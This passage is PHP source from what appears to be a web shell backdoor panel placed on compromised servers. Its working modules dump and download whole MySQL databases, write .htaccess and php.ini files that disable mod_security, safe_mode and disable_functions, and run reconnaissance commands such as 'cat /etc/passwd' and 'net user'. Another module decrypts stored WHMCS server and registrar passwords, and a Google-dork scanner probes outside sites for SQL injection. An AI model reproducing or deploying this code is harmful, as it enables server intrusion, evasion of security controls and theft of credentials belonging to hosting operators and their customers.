  2649.  
  2650. }
  2651.  
  2652. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysqlbackup'))
  2653. {
  2654. ?>
  2655. <form action="?y=<?php echo $pwd; ?>&amp;x=mysqlbackup" method="post">
  2656.  
  2657. <?php
  2658.  
  2659. echo '<center><br><br><br>
  2660. <table border=1 width=400 style="border-collapse: collapse" cellpadding=2>
  2661. <tr>
  2662. <td width=400 colspan=2 style=\'color:#FF0000;background-color:#000000\'><p align=center>
  2663. <b><font face=Arial size=2 style=\'color:#FF0000;background-color:#000000\'>Backup Database</font></b>
  2664. </td></tr>
  2665. <tr>
  2666. <td width=150 style=\'color:#FF0000;background-color:#000000\'>
  2667. <font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>DB Type:</font></td>
  2668. <td width=250 style=\'color:#FF0000;background-color:#000000\'>
  2669. <form method=post action="'.$me.'">
  2670. <select style=\'color:#FF0000;background-color:#000000\' name=method>
  2671. <option value="gzip">Gzip</option>
  2672. <option value="sql">Sql</option>
  2673. </select></td></tr>
  2674. <tr>
  2675. <td width=150 style=\'color:#FF0000;background-color:#000000\'>
  2676. <font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Server:</font>
  2677. </td>
  2678. <td width=250 style=\'color:#FF0000;background-color:#000000\'>
  2679. <input type=text name=server style=\'color:#FF0000;background-color:#000000\' value=localhost size=35>
  2680. </td></tr>
  2681. <tr>
  2682. <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Username:</font></td>
  2683. <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=username size=35></td>
  2684. </tr>
  2685. <tr>
  2686. <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Password:</font></td>
  2687. <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=password></td>
  2688. </tr>
  2689. <tr>
  2690. <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Data Base Name:</font></td>
  2691. <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=dbname></td>
  2692. </tr>
  2693. <tr>
  2694. <td width=400 colspan=2 style=\'color:#FF0000;background-color:#000000\'><center><input style=\'color:#FF0000;background-color:#000000\' type=submit value=" Dump! " ></td>
  2695. </tr>
  2696. </table></form></center></table>';
  2697. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  2698. $date = date("Y-m-d");
  2699. $dbserver = $_POST['server'];
  2700. $dbuser = $_POST['username'];
  2701. $dbpass = $_POST['password'];
  2702. $dbname = $_POST['dbname'];
  2703. $file = "Dump-$dbname-$date";
  2704. $method = $_POST['method'];
  2705. if ($method=='sql'){
  2706. $file="Dump-$dbname-$date.sql";
  2707. $fp=fopen($file,"w");
  2708. }else{
  2709. $file="Dump-$dbname-$date.sql.gz";
  2710. $fp = gzopen($file,"w");
  2711. }
  2712. function write($data) {
  2713. global $fp;
  2714. if ($_POST['method']=='sql'){
  2715. fwrite($fp,$data);
  2716. }else{
  2717. gzwrite($fp, $data);
  2718. }}
  2719.  
  2720. function filesize_n($path)
  2721. {
  2722. $size = @filesize($path);
  2723. if( $size < 0 ){
  2724. ob_start();
  2725. system('ls -al "'.$path.'" | awk \'BEGIN {FS=" "}{print $5}\'');
  2726. $size = ob_get_clean();
  2727. }
  2728.  
  2729. return $size;
  2730. }
  2731. function format_size($size) {
  2732. $sizes = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB");
  2733. if ($size == 0) { return('n/a'); } else {
  2734. return (round($size/pow(1024, ($i = floor(log($size, 1024)))), $i > 1 ? 2 : 0) . $sizes[$i]); }
  2735. }
  2736. mysql_connect ($dbserver, $dbuser, $dbpass);
  2737. mysql_select_db($dbname);
  2738. $tables = mysql_query ("SHOW TABLES");
  2739. while ($i = mysql_fetch_array($tables)) {
  2740. $i = $i['Tables_in_'.$dbname];
  2741. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  2742. write($create['Create Table'].";\n\n");
  2743. $sql = mysql_query ("SELECT * FROM ".$i);
  2744. if (mysql_num_rows($sql)) {
  2745. while ($row = mysql_fetch_row($sql)) {
  2746. foreach ($row as $j => $k) {
  2747. $row[$j] = "'".mysql_escape_string($k)."'";
  2748. }
  2749. write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  2750. }
  2751. }
  2752. }
  2753. if ($method=='sql'){
  2754. fclose ($fp);
  2755. }else{
  2756. gzclose($fp);}
  2757. $sizedatabasefile = filesize_n($file);
  2758. $sizehumanreadable = format_size($sizedatabasefile);
  2759. echo "<br><br>
  2760. <center><font color='#FF0000'>Download Database -&#62; </font>
  2761. <a href='$file'>Here</a>
  2762. <font color='#FF0000'> | DatabaseFileSize -&#62; $sizehumanreadable </font></center>";
  2763. flush();
  2764. }
  2765. }
  2766.  
  2767. elseif(isset($_GET['x']) && ($_GET['x'] == 'security-mode'))
  2768. {
  2769. ?>
  2770. <form action="?y=<?php echo $pwd; ?>&amp;x=security-mode" method="post">
  2771.  
  2772. <?php
  2773.  
  2774. echo "<html>
  2775. <center><br><br><br>
  2776. <font color=#FF0000 > Disable SafeMode and Clear Disable Function using php.ini </font><br>
  2777. <form method='POST' >
  2778. <font color=#FF0000 > Path to Disable : </font><input type='text' name='phpinisafemode' value='$pwd' style='color:#FF0000;background-color:#000000' /><br>
  2779. <input type='submit' name='dsmsubmit' style='color:#FF0000;background-color:#000000' value='Create PHP.INI' />
  2780. </form>
  2781. <br><br>
  2782. <font color=#FF0000 > Disable SafeMode and Clear Disable Function using Htaccess </font><br>
  2783. <form method='POST' >
  2784. <font color=#FF0000 > Path to Disable : </font><input type='text' name='htaccesssafemode' style='color:#FF0000;background-color:#000000' value='$pwd' /><br>
  2785. <input type='submit' name='omssubmit' style='color:#FF0000;background-color:#000000' value='Create .HTACCESS' />
  2786. </form>";
  2787.  
  2788. $dirphpini = $_POST['phpinisafemode'];
  2789. $dirhtaccess = $_POST['htaccesssafemode'];
  2790. $phpininamelol = "php.ini";
  2791.  
  2792. if($_POST['omssubmit'])
  2793. {
  2794. $fse=fopen("$dirphpini.htaccess","w");
  2795. fwrite($fse,'<IfModule mod_security.c>
  2796. Sec------Engine Off
  2797. Sec------ScanPOST Off
  2798. </IfModule>');
  2799. fclose($fse);
  2800. }
  2801.  
  2802. else if ($_POST['dsmsubmit'])
  2803. {
  2804. $fse=fopen("$dirhtaccess$phpininamelol","w");
  2805. fwrite($fse,'safe_mode=OFF
  2806. disable_functions=NONE');
  2807. fclose($fse);
  2808. }
  2809. }
  2810.  
  2811. elseif(isset($_GET['x']) && ($_GET['x'] == 'process'))
  2812. {
  2813. ?>
  2814. <form action="?y=<?php echo $pwd; ?>&amp;x=process" method="post">
  2815.  
  2816. <?php
  2817.  
  2818. function processc99() {
  2819. if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  2820. else {$handler = "tasklist";}
  2821. $ret = myshellexec($handler);
  2822. if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  2823. else
  2824. {
  2825. if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2826. $parsesort = parsesort($processes_sort);
  2827. if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2828. $k = $parsesort[0];
  2829. $ret = htmlspecialchars($ret);
  2830. if (!$win)
  2831. {
  2832. if ($pid)
  2833. {
  2834. if (is_null($sig)) {$sig = 9;}
  2835. echo "Sending signal ".$sig." to #".$pid."... ";
  2836. if (posix_kill($pid,$sig)) {echo "OK.";}
  2837. else {echo "ERROR.";}
  2838. }
  2839. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  2840. $stack = explode("\n",$ret);
  2841. $head = explode(" ",$stack[0]);
  2842. unset($stack[0]);
  2843. $prcs = array();
  2844. foreach ($stack as $line)
  2845. {
  2846. if (!empty($line))
  2847. {
  2848. echo "<tr>";
  2849. $line = explode(" ",$line);
  2850. $line[10] = join(" ",array_slice($line,10));
  2851. $line = array_slice($line,0,11);
  2852. $prcs[] = $line;
  2853. echo "</tr>";
  2854. }
  2855. }
  2856. }
  2857. else
  2858. {
  2859. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2860. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2861. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2862. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2863. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2864. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2865. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2866. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2867. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2868. while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2869. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2870. $ret = convert_cyr_string($ret,"d","w");
  2871. $stack = explode("\n",$ret);
  2872. unset($stack[0],$stack[2]);
  2873. $stack = array_values($stack);
  2874. $head = explode("",$stack[0]);
  2875. $head[1] = explode(" ",$head[1]);
  2876. $head[1] = $head[1][0];
  2877. $stack = array_slice($stack,1);
  2878. unset($head[2]);
  2879. $head = array_values($head);
  2880. if ($k > count($head)) {$k = count($head)-1;}
  2881. $prcs = array();
  2882. foreach ($stack as $line)
  2883. {
  2884. if (!empty($line))
  2885. {
  2886. echo "<tr>";
  2887. $line = explode("",$line);
  2888. $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2889. $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  2890. $prcs[] = $line;
  2891. echo "</tr>";
  2892. }
  2893. }
  2894. }
  2895. $head[$k] = "<b>".$head[$k]."</b>".$y;
  2896. $v = $processes_sort[0];
  2897. if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2898. $tab = array();
  2899. $tab[] = $head;
  2900. $tab = array_merge($tab,$prcs);
  2901. echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
  2902. foreach($tab as $i=>$k)
  2903. {
  2904. echo "<tr>";
  2905. foreach($k as $j=>$v) {
  2906. if ($win and $i > 0 and $j == 2) {
  2907. $v = view_size($v);
  2908. }
  2909.  
  2910. echo "<td>".$v."</td>";}
  2911. echo "</tr>";
  2912. }
  2913. echo "</table>";
  2914. }
  2915. }
  2916.  
  2917. echo "<center><br><br>";
  2918. if($win) {
  2919. echo "<form method='post'>
  2920. <select style='color:#FF0000;background-color:#000000' name='windowsprocess'>
  2921. <option name='systeminfo'>System Info</option>
  2922. <option name='active'>Active Connections</option>
  2923. <option name='runningserv'>Running Services</option>
  2924. <option name='useracc'>User Accounts</option>
  2925. <option name='showcom'>Show Computers</option>
  2926. <option name='arptab'>ARP Table</option>
  2927. <option name='ipconf'>IP Configuration</option>
  2928. </select>
  2929. <input type='submit' style='color:#FF0000;background-color:#000000' name='submitwinprocess' value='View'>
  2930. </form>
  2931. ";
  2932. } else {
  2933. echo "<form method='post'>
  2934. <select style='color:#FF0000;background-color:#000000' name='nonwindowsprocess'>
  2935. <option name='processsta'>Process status</option>
  2936. <option name='syslog'>Syslog</option>
  2937. <option name='resolv'>Resolv</option>
  2938. <option name='hosts'>Hosts</option>
  2939. <option name='passwd'>Passwd</option>
  2940. <option name='cpuinfo'>Cpuinfo</option>
  2941. <option name='version'>Version</option>
  2942. <option name='sbin'>Sbin</option>
  2943. <option name='interrupts'>Interrupts</option>
  2944. <option name='lsattr'>lsattr</option>
  2945. <option name='uptime'>Uptime</option>
  2946. <option name='fstab'>Fstab</option>
  2947. <option name='hddspace'>HDD Space</option>
  2948. </select>
  2949. <input type='submit' style='color:#FF0000;background-color:#000000' name='submitnonwinprocess' value='View'>
  2950. </form>
  2951. ";
  2952. }
  2953.  
  2954. $windowsprocess = $_POST['windowsprocess'];
  2955. $nonwindowsprocess = $_POST['nonwindowsprocess'];
  2956.  
  2957. if ($windowsprocess=="System Info") $winruncom = "systeminfo";
  2958. if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
  2959. if ($windowsprocess=="Running Services") $winruncom = "net start";
  2960. if ($windowsprocess=="User Accounts") $winruncom = "net user";
  2961. if ($windowsprocess=="Show Computers") $winruncom = "net view";
  2962. if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
  2963. if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
  2964. if ($nonwindowsprocess=="Process status") $systeminfo = "ps aux";
  2965. if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf";
  2966. if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf";
  2967. if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
  2968. if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
  2969. if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
  2970. if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
  2971. if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
  2972. if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
  2973. if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
  2974. if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
  2975. if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
  2976. if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
  2977.  
  2978.  
  2979. if (isset($winruncom)) {
  2980. echo "<table class='cmdbox'>
  2981. <tbody><tr>
  2982. <td colspan='2'>
  2983. <textarea class='output' name='content'>".exe($winruncom)."</textarea>
  2984. </td></tr></table></center>";
  2985. }
  2986.  
  2987. if (isset($systeminfo)) {
  2988. echo "<br><br>";
  2989. processc99();
  2990. }
  2991.  
  2992. }
  2993.  
  2994. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
  2995. {
  2996. ?>
  2997. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2998.  
  2999. <?php
  3000.  
  3001. function decrypt ($string,$cc_encryption_hash)
  3002. {
  3003. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  3004. $hash_key = _hash ($key);
  3005. $hash_length = strlen ($hash_key);
  3006. $string = base64_decode ($string);
  3007. $tmp_iv = substr ($string, 0, $hash_length);
  3008. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  3009. $iv = $out = '';
  3010. $c = 0;
  3011. while ($c < $hash_length)
  3012. {
  3013. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  3014. ++$c;
  3015. }
  3016. $key = $iv;
  3017. $c = 0;
  3018. while ($c < strlen ($string))
  3019. {
  3020. if (($c != 0 AND $c % $hash_length == 0))
  3021. {
  3022. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  3023. }
  3024. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  3025. ++$c;
  3026. }
  3027. return $out;
  3028. }
  3029.  
  3030. function _hash ($string)
  3031. {
  3032. if (function_exists ('sha1'))
  3033. {
  3034. $hash = sha1 ($string);
  3035. }
  3036. else
  3037. {
  3038. $hash = md5 ($string);
  3039. }
  3040. $out = '';
  3041. $c = 0;
  3042. while ($c < strlen ($hash))
  3043. {
  3044. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  3045. $c += 2;
  3046. }
  3047. return $out;
  3048. }
  3049.  
  3050. echo "<hr>
  3051. <br>
  3052. <center>
  3053. <br>
  3054.  
  3055. <FORM action='' method='post'>
  3056. <input type='hidden' name='form_action' value='2'>
  3057. <br>
  3058. <table border=1>
  3059. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_host' value='localhost'></td></tr>
  3060. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_username' value=''></td></tr>
  3061. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_password' value=''></td></tr>
  3062. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_name' value=''></td></tr>
  3063. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:#000000' type='text' size='30' name='cc_encryption_hash' value=''></td></tr>
  3064. </table>
  3065. <br>
  3066. <INPUT class=submit type='submit' style='color:#FF0000;background-color:#000000' value='Submit' name='Submit'>
  3067. </FORM>
  3068. </center>
  3069. <hr>";
  3070.  
  3071. if($_POST['form_action'] == 2 )
  3072. {
  3073. //include($file);
  3074. $db_host=($_POST['db_host']);
  3075. $db_username=($_POST['db_username']);
  3076. $db_password=($_POST['db_password']);
  3077. $db_name=($_POST['db_name']);
  3078. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  3079.  
  3080.  
  3081.  
  3082. $link=mysql_connect($db_host,$db_username,$db_password) ;
  3083. mysql_select_db($db_name,$link) ;
  3084. $query = mysql_query("SELECT * FROM tblservers");
  3085. while($v = mysql_fetch_array($query)) {
  3086. $ipaddress = $v['ipaddress'];
  3087. $username = $v['username'];
  3088. $type = $v['type'];
  3089. $active = $v['active'];
  3090. $hostname = $v['hostname'];
  3091. echo("<center><table border='1'>");
  3092. $password = decrypt ($v['password'], $cc_encryption_hash);
  3093. echo("<tr><td>Type</td><td>$type</td></tr>");
  3094. echo("<tr><td>Active</td><td>$active</td></tr>");
  3095. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  3096. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  3097. echo("<tr><td>Username</td><td>$username</td></tr>");
  3098. echo("<tr><td>Password</td><td>$password</td></tr>");
  3099.  
  3100. echo "</table><br><br></center>";
  3101. }
  3102.  
  3103. $link=mysql_connect($db_host,$db_username,$db_password) ;
  3104. mysql_select_db($db_name,$link) ;
  3105. $query = mysql_query("SELECT * FROM tblregistrars");
  3106. echo("<center>Domain Reseller <br><table border='1'>");
  3107. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  3108. while($v = mysql_fetch_array($query)) {
  3109. $registrar = $v['registrar'];
  3110. $setting = $v['setting'];
  3111. $value = decrypt ($v['value'], $cc_encryption_hash);
  3112. if ($value=="") {
  3113. $value=0;
  3114. }
  3115. $password = decrypt ($v['password'], $cc_encryption_hash);
  3116. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  3117. }
  3118. }
  3119. }
  3120. elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
  3121. {
  3122. ?>
  3123. <form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">
  3124.  
  3125. <?php
  3126.  
  3127. echo '<br><br><center><form method="post" action=""><font color="red">Dork :</font> <input type="text" value="" name="dork" style="color:#FF0000;background-color:#000000" size="20"/><input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan"></form></center>';
  3128.  
  3129. ob_start();
  3130. set_time_limit(0);
  3131.  
  3132. if (isset($_POST['scan'])) {
  3133.  
  3134. $browser = $_SERVER['HTTP_USER_AGENT'];
  3135.  
  3136. $first = "startgoogle.startpagina.nl/index.php?q=";
  3137. $sec = "&start=";
  3138. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  3139.  
  3140. for($id=0 ; $id<=30; $id++){
  3141. $page=$id*10;
  3142. $dork=urlencode($_POST['dork']);
  3143. $url = $first.$dork.$sec.$page;
  3144.  
  3145. $curl = curl_init($url);
  3146. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3147. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  3148. $result = curl_exec($curl);
  3149. curl_close($curl);
  3150.  
  3151. preg_match_all($reg,$result,$matches);
  3152. }
  3153. foreach($matches[1] as $site){
  3154.  
  3155. $url = preg_replace("/=/", "='", $site);
  3156. $curl=curl_init();
  3157. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  3158. curl_setopt($curl,CURLOPT_URL,$url);
  3159. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  3160. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  3161. $GET=curl_exec($curl);
  3162. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT *
  3163.  
  3164. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  3165. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font style="color:#FF0000"> &#60;-- SQLI Vuln
  3166.  
  3167. Found..</font></b></center>';
  3168. ob_flush();flush();
  3169. }else{
  3170. echo '<center><font style="color:#FFFFFF"><b>'.$url.'</b></font><font style="color:#0FFF16"> &#60;-- Not Vuln</font></center>';
  3171. ob_flush();flush();
  3172. }
  3173.  
  3174. ob_flush();flush();
  3175. }
  3176. ob_flush();flush();
  3177. }
  3178. ob_flush();flush();
  3179. }
  3180.  
  3181. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){ ?>
  3182. <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  3183. <br><br><? echo '<p style="text-align: center;"> <img alt="" src="data:image/gif;base64,R0lGODlhBQFDAPcAAPr6+vjv71pXWLpnZ1MBAZ6dnf39/ZMBAGQBAf4eHtTU1L0AALw0NLkAAdy8vP44OKwTE0wXF8cBAjwiIrpFRVRDQ6ECALQhIbSBgZtCQsQXF4wAAK4AAdKOjtvb27ITE1gYGJYoKKlHR7l0dK4dHfLy8pQyMtiqqkpJSbq6uv1NTbouLggFBbuRkWMXF70lJcVSUlg1NaUuLaYAAIMBAMAAAFIsLPX19UwnJyoBAYWCg6oAAMVnZzEKCuDg4MO4uBwbHMV/f4Q1Ne7u7ioaGszMzOfAwK0MDL07O8hYWeXNzciennsAALQAAHIWFrhTVMl0dOcCAnQAAKyrq0YDA6eIiIgiIpYYGJiGht+Ojp51dcPDw50AAP0ICMBCQjcWFrOzsyQiIr4UFNNISD47PNNXV97IyMNLS5gAADMyMuzf38IkJKt1derq6rwcHM48PLwMDLMMDMnHx6UMDPPf38uvr3orK2QsLM5JSiwrK7IrKmdkZcMsLHViY6k2NrIBANh9fENBQdqfn2shIaZgYHg5OUw2NosTFKSWlsszM3d0dcpVVebm5stBQbAAAGo6O7YBAKWlpcVdXbQ9PV8gIMolJcQzM8A9PoMKCXoMDA8PD+OwsKkGBtwCAs0sLMANDdVgYK4EBbUxMBsICKyhobkFBV5QUElERN3S0vDPzyYlJb4EBLqgoLQPD41ERB4TE6YEBPHm5tkZGc8CArYYGLEFBco3ODc1NbwQEJUJCctGR68QD7oXF7MXF7gnJ20pKZ8QEIcGBWsJCcQFBbQFBcAHB7oZGKUICF4ODsJHR7ACApwGBqMGBJGPkOTj46sJCLwDBConKLwICMEQEMYHB1JQUKsDA4oKCuMqKrcBALQDA8EBALMBAYMPD5M/P9BPUN5TU8MvL7tOTsMeHrAICNq/
  3184. v744Obs3N5CBgVA+Pr4gIKYCArcJCTEuLrlvb8cwMM5YWVEODXNtbncGBsQoJ3oQEDo4OP4CAqwAAKQAAMQAASMfIMIAAMgAAP///wAAACH5BAAAAAAALAAAAAAFAUMAAAj/APsJHEiwoMGB/Bb8mYHmAA0mUiJKZMKExgEuO/404Hewo8ePIEOKHEmypMmTKFOqXDlQ3wJHXDZAFEKoRbly/nLqvBmEkJUNaPI5WsCRpdGjSJMqXcrUJL8GOw4wqUdoSQCdWLNiVSPoyUV8G5uKHUu2rNmj+hrM2CBFiFWsAOrU2eJhCAADWv1l2eQvQAcSXPARPUu4sOHDISUoXsy4sYQF+A5IcYUTK982QcZIalGE0V2tAQQ1ApXKn6AQXJQt0Oe4tevXsGPLnk27tu3buHPr3r1YXzYuNKzU0WngRok2APwB8GHLkyceqG7gzesPEC4YVzsAm9FAH2ve4MOL/x9PPjyXQzLSq9dTbIFu7/Djx6/BQSqbq/48pPhhxocDJcmVAIgG02zTSlYGAJCcTnR0oJMa4ljQRA3yVWjhhRhmqOGGHHbo4YcghqghFySo8MCJJyYwiwYicrjADhvUc4I/qCwBRgHuJCKIAYIkktMQcrCIBiFZAVBCCQvmFMAmdOjUgQVD8dPilFRWaeWVWGLIBS8J3OOll1HMUUmW8S0wAw0m0GEAK6B8MwAGY2RzFQDf5FRCERo0cUiTcAEASF745ZQKBBwQReahiCaqqIhbdvnlPVEcMSaZ2zSQD5oBMIIBKGM4Nw4kh9iZihHKeZDIDhlQR50CBTRTQDmp0P8hikbbLGrrrbgiyoUxjn4Z5qQh8iPssMLWYCYNRHowAji2aEDNAhZ0o0ZOsYCiUwlZcOGOqlk5I0AY+4S7DyWbBLBCEwvUQOy67Lbr7rvwxivvvPTWa++9+Arb6KOQipnvu8eaQCMP33jCYhNoSLFETgYsiVUAkgTBrU4KtCNuuGGoMoEgAYSTTbr/
  3185. hizyyCSXbPK6+z7668k14LOBEFdl5skn/DQhGQY/OpMkVnxOLMDFGIPrwiap4NJADeqerPTSTDedb8q++ltyDTbXM+0WkiQyjUtcSDGccnK0EF1y001MMdBAA2GJGUYscLTTcMctd9NQgyk1vtvkrXcDXDD/MZwPiIxRyTDbQHIAzjm1AcYYUHjgjHRmY9UM2uICAYQMlQQASAML6O3556CHLvropJdu+umop6766qnX3W8lrIf+Ig1s+GPAFDy8oUHe2aDRcxs/eNJIOR20YUDZZk9OebhAXCFBI/40km7s1I/+hwUbbECDRRZA0nn1o0N1gPYHWPDH97E3EJn23J8P/umu/+o5JNiTP0M2NYSO9P42W3GVHGwQXDGQ9pIdKagEzoAEF/6ggVgcD3ncUt7ygJCLDnAhC3RYgAb3V4MzSQEBIAyhCEdIQhBuYAfp4qAKa7ADGiCAChHAgQ1maIMIxAMBNEDhCnfowREyIR9HYyET/wgQjwjQ0IZSQAO6dsjEBeRjiEWkYQ1vuAHBMPGKWFRh/MRkrK4RwAVWUE89hCEFCwRxfxrUoKWYsLAhkGIRWkujBvngALsYQA2DMEU6lgGFu0BQVQpYHvO84I9NhIAOgJCjBtFAiQo48pGQjKQkHzmBDShSkfmQAgFwUIE9VCMQZEjDLW5BBhScwgbIoAEQL6lIRkoSBwhYQBNosElTCAAFgRAlGU4RCBwwgTusvGQmqWADW+JSlKQ8xSlTKZhgOvOZaUQDl/j1qxlo0gTgUIGJUKSCN0CABjMIZhM24I2cFAEDbxjHKuTYgCa0wgglaIY9yBCIaNRjHHQIVOR+Rv85IOyBL33pyzRaGYE0WO6gCE2oQg/6jyt8gpWzJIANBFCNdmjiHxjNKEZZAIQ0oFKJz0RDQRP6D2QsQAoRoGgeLqrRf7BgH+0QBhc+5swGHECit1QFS1vK0TTgYB6rhKZQWzlNlc2hGAiwgzYT0AV+3SMBCcDGMsKpSLUwoTJbGMA7BqpBbszAIfMo
  3186. xCmAFoEZPCFyWHGGxdLWDndATyc3gMI25ChSILT0rni9awgeqsg/SCEepkCBKliQV42yQBOqiEAVnVnXuyJjAzgQQBoIW1hNvAIBzWRlNjZAgApUIwyULexhwyBT7w31tNLsFZiosYFJmKipTv0SU0OR2a7/HsAKiQPDIiohjQV4VSrCeIQ8qrEPILwCCOGKQRD0idYS8FNciqgDHxYwJwWhQgx0jYBdC8tdjYaAq2nkBkoFcIuddnejr/jCYlnZ2JYSgBLVUMV5XcoCLnAjmJw1RSDM211NaAIBwDytUFPLry5EoRIqUG1svWTgP5hWgy1cWH5Ikc4FKAMNTAiuPARgD+MCoRBX2Icq9qAT5kbOGVNoRgpKYIAhAGIGO3LcceDRnkVqd77d3Ss7mRAPAbQjtDjGqCZGgYbzXbK9Gv2CPeQbZCpw7pJcQEAFyMDf87KABUywhoAHXNQvdaELUAVTJzoRhQV7qRhPXkA2LMCEOckB/wPNWvM8hMth476iEJJ4AzPSkIc0oPXPASBBEG7AiiD4wBl1EEONkRxkvWI3jTetxmQbbVgW5GAGD47mjStt3vS+QrT/aEWauyoFG5yiyhj9whdGkdcrY3rLIe2yUyWwAQQ44RDd4MIsYtuFYfBVIQcgkj+GkIIBJOITCPvFHgJR3DtL4hu2kAYwApGHffz5z0ZIhQJGgIe5gKERXM0GAs77hR4AmaeTAC8+EGAIMpx7o3fwRgYyMAhW4/XKCBgKQbd770IkoQxjGMM5elDYQ4x6AQeIx1jvyoJH/BsPeJgEwfGab1gzVta+moEwMgCPMkD8Eq3YtVNngYs0ukzCPv+YAgzoIQ0F/oLZRMAztMfxCUccIBAWa24B9rDWfZBBEc7IyxBYkQRb0AMKVdCFBjQojXE0ogxQj7rU8QAHYQDh3S4VwRt6q0EagAAFqL5DEvDwjnGMgx6JGATWr+wIdGWX3y19xRN0oc4FQOMT08hBXpEBXjWX2h7nZoEI8FD3u2uACgxnQS3cbnGi
